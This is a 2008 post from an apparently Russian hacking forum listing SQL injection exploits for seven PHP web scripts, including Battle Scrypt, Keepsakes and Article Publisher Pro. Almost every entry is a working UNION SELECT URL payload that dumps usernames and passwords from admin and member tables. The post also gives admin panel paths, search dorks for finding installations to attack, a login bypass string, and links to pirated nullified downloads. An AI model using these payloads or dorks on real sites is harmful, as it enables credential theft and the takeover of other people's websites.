|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Battle Scrypt SQL Injection
Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: Battle Scrypt
Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Код:
http://localhost/[installdir]/search.php
Model Name:
Exploit:
Код:
' union select 1,user(),3/*
Код:
http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*
Big Fat Rate My Photo AdSense Website SQL Injection
Author: ~!Dok_tOR!~
Date found: 29.08.08
Product: Big Fat Rate My Photo AdSense Website
Price: $14.99
URL: www.dotcomallsorts.com
Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website. rar
Vulnerability Class: SQL Injection
Exploit 1:
Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
Exploit 2:
Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
Admin panel:
Код:
http://localhost/[installdir]/admin/
Article Publisher Pro <= v1.5 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Article Publisher Pro v1.5
Price: $75
URL: www.phparticlescript.com
Vulnerability Class: SQL Injection
Exploit 1:
Код:
http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
Exploit 2:
Код:
http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
Dork:
All rights reserverd © Your Articles Pro 2002-2005
Copyright 2006 - 2008, Article Publisher PRO v1.5
Keepsakes SQL Injection
Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: Keepsakes
Price: $25
URL: harlandscripts.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
Opera -> Source(Ctrl+F3)
Exploit 2:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
Opera -> Source(Ctrl+F3)
Exploit 3:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
Opera -> Source(Ctrl+F3)
Exploit 4:
Код:
http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Exploit 5:
Код:
http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Admin panel:
Код:
http://localhost/[installdir]/admin/
Dork:
Copyright Your Keepsakes ® ™ 2007
Smart Traffic 6 in 1 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Smart Traffic 6 in 1
Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
Код:
http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*
TopCoolive SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: TopCoolive
URL: www.vetton.ru
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 2:
Код:
http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 3:
Код:
http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*
Warez Script (by Mikel Dean) SQL Injection
Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: Warez Script
Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
Exploit 2:
Код:
http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
Код:
http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
Admin Authentication Bypass
Код:
http://localhost/[installdir]/v2/login.php
User: 1' or 1=1/*
Pass: 1' or 1=1/*
(c) ~!Dok_tOR!~
Последний раз редактировалось ~!DoK_tOR!~; 19.09.2008 в 15:30..
|